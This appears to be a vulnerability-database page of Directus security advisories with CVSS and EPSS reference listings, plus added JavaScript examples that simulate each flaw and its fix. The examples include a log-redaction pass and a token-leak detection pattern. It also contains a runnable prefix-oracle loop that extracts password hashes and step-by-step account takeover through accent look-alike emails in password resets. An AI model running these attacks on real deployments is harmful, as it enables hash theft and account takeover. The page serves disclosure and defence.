Directus is a real-time API and App dashboard for managing SQL database content. In versions prior to 9.16.0 users with read access to the `password` field in `directus_users` can extract the argon2 password hashes by brute forcing the export functionality combined with a `_starts_with` filter. This allows the user to enumerate the password hashes. Accounts cannot be taken over unless the hashes can be reversed which is unlikely with current hardware. This problem has been patched by preventing any hashed/concealed field to be filtered against with the `_starts_with` or other string operator in version 9.16.0. Users are advised to upgrade. Users unable to upgrade may mitigate this issue by ensuring that no user has `read` access to the `password` field in `directus_users`.
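The summary above describes an oracle: an export filtered with `_starts_with` on the `password` field returns rows or not, and that single bit per request is enough to recover an argon2 encoded hash character by character. The following is an added example (not Directus code) that simulates the filtered export over constructed rows, runs the prefix-extension attack against it, and then shows the shape of the 9.16.0 fix, refusing string operators on hashed/concealed fields. The hash strings only imitate argon2's encoding and are not real digests; the operator list in `STRING_OPERATORS` is illustrative.

```javascript
// Added example (not Directus code): the prefix oracle behind CVE-2023-27481 and
// the shape of the 9.16.0 fix. Rows and hashes are constructed; the hash strings
// imitate argon2's encoded form but are not real digests.
const DIRECTUS_USERS = [
  { id: 'a1', email: 'admin@example.com', password: '$argon2id$v=19$m=65536,t=3,p=4$c2FsdHNhbHQ$aGFzaGhhc2g=' },
  { id: 'b2', email: 'editor@example.com', password: '$argon2id$v=19$m=65536,t=3,p=4$b3RoZXJzYWx0$b3RoZXJoYXNo' },
];

const OPERATORS = {
  _eq: (stored, wanted) => stored === wanted,
  _starts_with: (stored, wanted) => typeof stored === 'string' && stored.startsWith(wanted),
};

// Filter shape mirrors the API: { field: { _operator: value }, ... }
function applyFilter(filter) {
  return DIRECTUS_USERS.filter((row) =>
    Object.entries(filter).every(([field, cond]) =>
      Object.entries(cond).every(([op, value]) => OPERATORS[op](row[field], value))));
}

// Vulnerable export: any operator runs against any field the role can read,
// the concealed password column included.
const exportVulnerable = applyFilter;

// Characters that can occur in an argon2 encoded string.
const ALPHABET = '$abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=,';

// The attack: each request asks "does the target's hash start with prefix+ch?"
// and a non-empty export answers yes. One character is recovered per accepted
// guess, at most ALPHABET.length requests per character; the loop ends when no
// single-character extension matches any more.
function extractHash(oracle, userId) {
  let prefix = '';
  let requests = 0;
  for (;;) {
    let extended = false;
    for (const ch of ALPHABET) {
      requests += 1;
      if (oracle({ id: { _eq: userId }, password: { _starts_with: prefix + ch } })) {
        prefix += ch;
        extended = true;
        break;
      }
    }
    if (!extended) return { hash: prefix, requests };
  }
}

// Hardened export, following the fix the advisory describes: string operators
// are refused on hashed/concealed fields, so the prefix oracle no longer exists.
const CONCEALED_FIELDS = new Set(['password']);
const STRING_OPERATORS = new Set([
  '_starts_with', '_nstarts_with', '_ends_with', '_nends_with', '_contains', '_ncontains', '_icontains',
]);
function exportHardened(filter) {
  for (const [field, cond] of Object.entries(filter)) {
    if (!CONCEALED_FIELDS.has(field)) continue;
    for (const op of Object.keys(cond)) {
      if (STRING_OPERATORS.has(op)) throw new Error(`${op} is not permitted on concealed field "${field}"`);
    }
  }
  return applyFilter(filter);
}

const vulnerableOracle = (filter) => exportVulnerable(filter).length > 0;
console.log(extractHash(vulnerableOracle, 'a1'));
```

The advisory's interim mitigation (no role may read `password`) removes the oracle by removing the field; the code-level fix keeps the field readable for roles that need it but stops any query from turning it into a comparison target.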
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-27481
reference_id
reference_type
scores
0
value 0.00301
scoring_system epss
scoring_elements 0.53689
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-27481
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/pull/14829
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/pull/14829
3
reference_url https://github.com/directus/directus/pull/15010
reference_id
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/pull/15010
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-27481
reference_id CVE-2023-27481
reference_type
scores
0
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-27481
5
reference_url https://github.com/advisories/GHSA-m5q3-8wgf-x8xf
reference_id GHSA-m5q3-8wgf-x8xf
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-m5q3-8wgf-x8xf
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf
reference_id GHSA-m5q3-8wgf-x8xf
reference_type
scores
0
value 4.3
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
1
value 6.5
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:N
2
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
3
value MODERATE
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-25T14:30:10Z/
url https://github.com/directus/directus/security/advisories/GHSA-m5q3-8wgf-x8xf
fixed_packages
0
url pkg:npm/directus@9.16.0
purl pkg:npm/directus@9.16.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-eygf-cb4y-hqd3
5
vulnerability VCID-gjju-tu4e-gqfc
6
vulnerability VCID-hrqc-8err-4fbx
7
vulnerability VCID-kqs7-8txh-jyc8
8
vulnerability VCID-m3wb-sstx-v3d6
9
vulnerability VCID-msb5-197k-a3er
10
vulnerability VCID-szny-2sbf-v7de
11
vulnerability VCID-v4vz-smcx-gygb
12
vulnerability VCID-wgag-36wa-qyay
13
vulnerability VCID-xc7t-gwaz-ckeu
14
vulnerability VCID-xt9c-32g5-mqes
15
vulnerability VCID-yutw-33sk-5fg3
16
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.16.0
aliases CVE-2023-27481, GHSA-m5q3-8wgf-x8xf
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-et4m-8y15-9fb9
7
url VCID-eygf-cb4y-hqd3
vulnerability_id VCID-eygf-cb4y-hqd3
summary
Insertion of Sensitive Information into Log File
Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 9.23.3, the `directus_refresh_token` is not redacted properly from the log outputs and can be used to impersonate users without their permission. This issue is patched in version 9.23.3.
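Two advisories on this page are about secrets reaching logs: the session JWT passed in the URL of the /files page (VCID-3cgw-zr3k-3fen above) and the `directus_refresh_token` that was not redacted from log output (this entry). The following is an added example, not Directus's `api/src/logger.ts` (which is pino-based; pino's `redact` option is the production way to do this). It redacts a constructed request log record by hand so it runs with no dependencies, and ends with a check that fails if a token-shaped value survives serialisation. The header and token values are constructed, and `access_token` as the query-parameter name is an assumption for the example.

```javascript
// Added example (not Directus's logger.ts): a redaction pass over a request log
// record. The record, header values and token strings are constructed;
// `access_token` as the query-parameter name is an assumption.
const SAMPLE_REQUEST_LOG = {
  level: 'info',
  msg: 'request completed',
  req: {
    method: 'GET',
    url: '/assets/3f1a9c?access_token=eyJhbGciOiJIUzI1NiJ9.e30.c2lnbmF0dXJl&width=200',
    headers: {
      host: 'cms.example.com',
      authorization: 'Bearer eyJhbGciOiJIUzI1NiJ9.e30.YW5vdGhlcg',
      cookie: 'directus_refresh_token=8f1c2d3e4a5b6c7d8e9f0a1b2c3d4e5f; theme=dark',
    },
  },
};

const REDACTED = '[REDACTED]';
const SENSITIVE_HEADERS = new Set(['authorization', 'proxy-authorization']);
const SENSITIVE_COOKIES = new Set(['directus_refresh_token']); // add any other auth cookie your deployment sets
const SENSITIVE_QUERY_PARAMS = new Set(['access_token']);

// "a=1; b=2": mask only the values of sensitive cookies, keep the rest readable.
function redactCookieHeader(value) {
  return value.split(';').map((part) => {
    const trimmed = part.trim();
    const eq = trimmed.indexOf('=');
    const name = eq === -1 ? trimmed : trimmed.slice(0, eq);
    return eq !== -1 && SENSITIVE_COOKIES.has(name) ? `${name}=${REDACTED}` : trimmed;
  }).join('; ');
}

// Mask token-bearing query parameters so a token carried in the URL (the /files
// case) never reaches the log line.
function redactUrl(url) {
  const q = url.indexOf('?');
  if (q === -1) return url;
  const params = url.slice(q + 1).split('&').map((pair) => {
    const eq = pair.indexOf('=');
    const key = eq === -1 ? pair : pair.slice(0, eq);
    return eq !== -1 && SENSITIVE_QUERY_PARAMS.has(key) ? `${key}=${REDACTED}` : pair;
  });
  return url.slice(0, q + 1) + params.join('&');
}

// Works on a deep copy so the live request object is never mutated.
function redactRecord(record) {
  const out = JSON.parse(JSON.stringify(record));
  if (out.req) {
    if (typeof out.req.url === 'string') out.req.url = redactUrl(out.req.url);
    const headers = out.req.headers || {};
    for (const name of Object.keys(headers)) {
      const lower = name.toLowerCase();
      if (SENSITIVE_HEADERS.has(lower)) headers[name] = REDACTED;
      else if (lower === 'cookie') headers[name] = redactCookieHeader(headers[name]);
    }
  }
  return out;
}

// Regression check for this bug class: does the serialised record still carry a
// usable refresh token, bearer token or access_token value?
function leaksSecret(serialised) {
  return /(directus_refresh_token=|access_token=|Bearer )(?!\[REDACTED\])[A-Za-z0-9._\-]{8,}/.test(serialised);
}

console.log(JSON.stringify(redactRecord(SAMPLE_REQUEST_LOG)));
```

Running `leaksSecret` over every serialised log line in a test suite is cheap and catches the exact regression the advisory describes: a new header, cookie or query parameter that starts carrying a credential without being added to the redaction list.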
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2023-28443
reference_id
reference_type
scores
0
value 0.00061
scoring_system epss
scoring_elements 0.19237
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2023-28443
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/blob/7c479c5161639aac466c763b6b958a9524201d74/api/src/logger.ts#L13
3
reference_url https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/commit/349536303983ccba68ecb3e4fb35315424011afc
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2023-28443
reference_id
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2023-28443
5
reference_url https://github.com/advisories/GHSA-8vg2-wf3q-mwv7
reference_id GHSA-8vg2-wf3q-mwv7
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-8vg2-wf3q-mwv7
6
reference_url https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7
reference_id GHSA-8vg2-wf3q-mwv7
reference_type
scores
0
value 4.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N
1
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
2
value MODERATE
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-02-21T15:28:44Z/
url https://github.com/directus/directus/security/advisories/GHSA-8vg2-wf3q-mwv7
fixed_packages
0
url pkg:npm/directus@9.23.3
purl pkg:npm/directus@9.23.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-ejme-tqn4-byhk
4
vulnerability VCID-gjju-tu4e-gqfc
5
vulnerability VCID-hrqc-8err-4fbx
6
vulnerability VCID-jmem-8d4q-x7br
7
vulnerability VCID-kqs7-8txh-jyc8
8
vulnerability VCID-m3wb-sstx-v3d6
9
vulnerability VCID-msb5-197k-a3er
10
vulnerability VCID-wgag-36wa-qyay
11
vulnerability VCID-xc7t-gwaz-ckeu
12
vulnerability VCID-xt9c-32g5-mqes
13
vulnerability VCID-yutw-33sk-5fg3
14
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.23.3
aliases CVE-2023-28443, GHSA-8vg2-wf3q-mwv7
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-eygf-cb4y-hqd3
8
url VCID-gjju-tu4e-gqfc
vulnerability_id VCID-gjju-tu4e-gqfc
summary
Directus has MySQL accent insensitive email matching
## Password reset vulnerable to accent confusion

The password reset mechanism of the Directus backend, combined with a specific (by default, accent-insensitive) collation configuration in MySQL or MariaDB, allows an attacker to receive a victim's password reset email at a look-alike address in which one or more characters of the victim's address have been replaced with accented variants.

This is because by default MySQL/MariaDB are configured for accent-insensitive and case-insensitive string comparisons.

MySQL weak comparison:
```sql
select 1 from directus_users where 'julian@cure53.de' = 'julian@cüre53.de';
```

This is exploitable due to an error in the API using the supplied email address for sending the reset password mail instead of using the email from the database.

### Steps to reproduce:

1. If the attacker knows the email address of the victim user, i.e., `julian@cure53.de`. (possibly just the domain could be enough for an educated guess)
2. A off-by-one accented domain `cüre53.de` can be registered to be able to receive emails.
3. With this email the attacker can request a password reset for `julian@cüre53.de`. 
```http
POST /auth/password/request HTTP/1.1
Host: example.com
[...]
{"email":"julian@cüre53.de"}
```
4. The supplied email (julian@cüre53.de) gets checked against the database and will match the non-accented email `julian@cure53.de` and will continue to email the password reset link to the provided email address instead of the saved email address.
5. With this email the attacker can log into the target account and use it for nefarious things

### Workarounds
Should be possible with collations but haven't been able to confirm this. 

### References
- https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation/
- https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
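As an added illustration of the mechanism above (example code written for this page, not Directus's implementation or its fix commit), the following JavaScript emulates a users lookup under an accent- and case-insensitive collation with a constructed user table, and contrasts a reset handler that mails the address from the request with one that mails the address stored on the matched record. The user record, function names and the `information_schema` query in the comment are assumptions; the emulated collation approximates `utf8mb4_0900_ai_ci` for Latin accented letters only.

```javascript
// Added example (not Directus code): emulates a users lookup under MySQL's
// default accent- and case-insensitive collation (utf8mb4_0900_ai_ci) and
// contrasts a reset handler that mails the address from the request with
// one that mails the address stored on the matched record.

// Constructed sample of the directus_users table (one made-up record).
const directusUsers = [
  { id: 'a1b2c3', email: 'julian@cure53.de' },
];

// Approximate an _ai_ci collation key: decompose to NFD, drop combining
// marks (the accents), fold case. Real collations use Unicode collation
// weights, but for Latin accented letters the outcome is the same:
// "cüre53" collates equal to "cure53".
function aiCiKey(s) {
  return s.normalize('NFD').replace(/[\u0300-\u036f]/g, '').toLowerCase();
}

// Emulates `SELECT * FROM directus_users WHERE email = ?` under _ai_ci.
function findUserAccentInsensitive(email) {
  const key = aiCiKey(email);
  return directusUsers.find((u) => aiCiKey(u.email) === key) || null;
}

// Vulnerable pattern: the lookup matches under the weak collation and the
// reset link is addressed to the e-mail taken from the request body.
function requestResetVulnerable(suppliedEmail) {
  const user = findUserAccentInsensitive(suppliedEmail);
  if (!user) return null;
  return { userId: user.id, sendTo: suppliedEmail };
}

// Hardened pattern: address the mail to the e-mail stored on the matched
// record, and treat a match that only holds under the collation (accents
// differ after case folding) as "no such user". The HTTP layer should answer
// identically in both cases so the endpoint does not enumerate accounts.
function requestResetHardened(suppliedEmail) {
  const user = findUserAccentInsensitive(suppliedEmail);
  if (!user) return null;
  const supplied = suppliedEmail.normalize('NFC').toLowerCase();
  if (supplied !== user.email.toLowerCase()) return null;
  return { userId: user.id, sendTo: user.email };
}

// To see which collation the column really uses, run against the database:
//   SELECT COLUMN_NAME, COLLATION_NAME FROM information_schema.COLUMNS
//    WHERE TABLE_NAME = 'directus_users' AND COLUMN_NAME = 'email';
// A name ending in _ai_ci is accent- and case-insensitive; _as_cs is neither.

console.log(requestResetVulnerable('julian@cüre53.de')); // mails the attacker's domain
console.log(requestResetHardened('julian@cüre53.de'));  // null
console.log(requestResetHardened('Julian@cure53.de'));  // mails the stored address
```

Mailing the stored address is the change that actually removes the attacker's gain; the extra exact-match check is defence in depth so that a lookup which only succeeds because of the collation never proceeds at all.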
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-27295
reference_id
reference_type
scores
0
value 0.00604
scoring_system epss
scoring_elements 0.69922
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-27295
1
reference_url https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://dev.mysql.com/doc/refman/8.0/en/charset-unicode-sets.html
2
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
3
reference_url https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/a8ef790ea2d28b1727f9027d99bd360920d57919
4
reference_url https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation
reference_id
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.monolune.com/articles/what-is-the-utf8mb4_0900_ai_ci-collation
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-27295
reference_id CVE-2024-27295
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-27295
6
reference_url https://github.com/advisories/GHSA-qw9g-7549-7wg5
reference_id GHSA-qw9g-7549-7wg5
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-qw9g-7549-7wg5
7
reference_url https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5
reference_id GHSA-qw9g-7549-7wg5
reference_type
scores
0
value 8.2
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2024-03-05T19:45:59Z/
url https://github.com/directus/directus/security/advisories/GHSA-qw9g-7549-7wg5
fixed_packages
0
url pkg:npm/directus@10.8.3
purl pkg:npm/directus@10.8.3
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-eb8p-vqjt-yfb8
3
vulnerability VCID-kqs7-8txh-jyc8
4
vulnerability VCID-m3wb-sstx-v3d6
5
vulnerability VCID-msb5-197k-a3er
6
vulnerability VCID-wgag-36wa-qyay
7
vulnerability VCID-xc7t-gwaz-ckeu
8
vulnerability VCID-xt9c-32g5-mqes
9
vulnerability VCID-yutw-33sk-5fg3
10
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@10.8.3
aliases CVE-2024-27295, GHSA-qw9g-7549-7wg5
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gjju-tu4e-gqfc
9
url VCID-gpfk-nsnr-4khn
vulnerability_id VCID-gpfk-nsnr-4khn
summary
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2022-23080
reference_id
reference_type
scores
0
value 0.00116
scoring_system epss
scoring_elements 0.30093
published_at 2026-05-30T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2022-23080
1
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
2
reference_url https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83
reference_id
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/6da3f1ed5034115b1da00440008351bf0d808d83
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2022-23080
reference_id CVE-2022-23080
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2022-23080
4
reference_url https://www.mend.io/vulnerability-database/CVE-2022-23080
reference_id CVE-2022-23080
reference_type
scores
0
value 5.0
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N
1
value MODERATE
scoring_system generic_textual
scoring_elements
url https://www.mend.io/vulnerability-database/CVE-2022-23080
5
reference_url https://github.com/advisories/GHSA-5h75-pvq4-82c9
reference_id GHSA-5h75-pvq4-82c9
reference_type
scores
0
value MODERATE
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-5h75-pvq4-82c9
fixed_packages
0
url pkg:npm/directus@9.7.0
purl pkg:npm/directus@9.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-3cgw-zr3k-3fen
1
vulnerability VCID-8r4e-a1vf-9bd9
2
vulnerability VCID-9gba-zszk-p3h6
3
vulnerability VCID-eb8p-vqjt-yfb8
4
vulnerability VCID-ejme-tqn4-byhk
5
vulnerability VCID-et4m-8y15-9fb9
6
vulnerability VCID-eygf-cb4y-hqd3
7
vulnerability VCID-gjju-tu4e-gqfc
8
vulnerability VCID-hrqc-8err-4fbx
9
vulnerability VCID-kqs7-8txh-jyc8
10
vulnerability VCID-m3wb-sstx-v3d6
11
vulnerability VCID-msb5-197k-a3er
12
vulnerability VCID-szny-2sbf-v7de
13
vulnerability VCID-v4vz-smcx-gygb
14
vulnerability VCID-wgag-36wa-qyay
15
vulnerability VCID-xt9c-32g5-mqes
16
vulnerability VCID-yutw-33sk-5fg3
17
vulnerability VCID-yz34-qwam-wbcn
resource_url http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.7.0
aliases CVE-2022-23080, GHSA-5h75-pvq4-82c9
risk_score 3.1
exploitability 0.5
weighted_severity 6.2
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-gpfk-nsnr-4khn
10
url VCID-hrqc-8err-4fbx
vulnerability_id VCID-hrqc-8err-4fbx
summary
Directus affected by VM2 sandbox escape vulnerability
### Impact
In vm2 versions up to 3.9.19, Promise handler sanitization can be bypassed, allowing attackers to escape the sandbox and run arbitrary code. Within Directus this applies to the "Run Script" operation in flows: a script run by that operation could escape the sandbox and execute code in the main Node.js context.

### Patches
Patched in v10.6.0 by replacing `vm2` with `isolated-vm`.

### Workarounds
None

### References
https://github.com/patriksimek/vm2/security/advisories/GHSA-cchq-frgv-rjh5
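Because the advisory offers no workaround, the practical question for an operator is whether a deployment still carries the vulnerable sandbox. The following JavaScript, added here as an example (it is not Directus or vm2 code), walks an npm lockfile in the lockfileVersion 2/3 layout (the `packages` map keyed by `node_modules/...` path) and flags every `vm2` entry at or below 3.9.19 together with whether the `directus` entry is at or past 10.6.0. The lockfile fragment is constructed for the demo; version 1 lockfiles (`dependencies` tree) are not handled.

```javascript
// Added example (not Directus code): audit a package-lock.json for copies of
// vm2 in the affected range (<= 3.9.19 per the advisory) and report whether
// the directus entry is at or past the release that dropped vm2 (10.6.0).

// Compare dotted versions; a pre-release (e.g. 10.6.0-rc.1) sorts before the
// corresponding release, as in semver. Build metadata is not handled.
function compareVersions(a, b) {
  const [aMain, aPre] = a.split('-');
  const [bMain, bPre] = b.split('-');
  const an = aMain.split('.').map(Number);
  const bn = bMain.split('.').map(Number);
  for (let i = 0; i < 3; i++) {
    const d = (an[i] || 0) - (bn[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  if (aPre && !bPre) return -1;
  if (!aPre && bPre) return 1;
  return 0;
}

// "node_modules/a/node_modules/vm2" -> "vm2"; scoped names keep "@scope/name".
function packageName(nodeModulesPath) {
  const parts = nodeModulesPath.split('node_modules/');
  return parts[parts.length - 1];
}

function auditLockfile(lock) {
  const findings = { vm2: [], directus: null, directusPatched: false };
  for (const [path, entry] of Object.entries(lock.packages || {})) {
    if (path === '') continue; // the root project entry
    const name = packageName(path);
    if (name === 'vm2' && compareVersions(entry.version, '3.9.19') <= 0) {
      findings.vm2.push({ path, version: entry.version });
    }
    if (name === 'directus') findings.directus = entry.version;
  }
  findings.directusPatched =
    findings.directus !== null && compareVersions(findings.directus, '10.6.0') >= 0;
  return findings;
}

// Constructed lockfile fragment for the demo: directus 10.5.3 with a nested
// vm2 plus a hoisted vm2, both in the affected range.
const sampleLock = {
  lockfileVersion: 3,
  packages: {
    '': { name: 'my-app', version: '1.0.0' },
    'node_modules/directus': { version: '10.5.3' },
    'node_modules/directus/node_modules/vm2': { version: '3.9.19' },
    'node_modules/vm2': { version: '3.9.19' },
  },
};

console.log(JSON.stringify(auditLockfile(sampleLock), null, 2));
```

To run it against a real tree, replace `sampleLock` with `JSON.parse(fs.readFileSync('package-lock.json', 'utf8'))`. A flagged `vm2` path that is not under `node_modules/directus` belongs to some other dependency and needs its own upgrade path.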
references
0
reference_url https://github.com/directus/directus
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus
1
reference_url https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058
reference_id
reference_type
scores
0
value 7.6
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:H/PR:H/UI:R/S:C/C:H/I:H/A:H
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/directus/directus/commit/284156426fa94f688e8d65a7a4f34f9e6705f058
2
reference_url https://github.com/directus/directus/pull/19332
reference_id
reference_type
scores
0
value 7.6
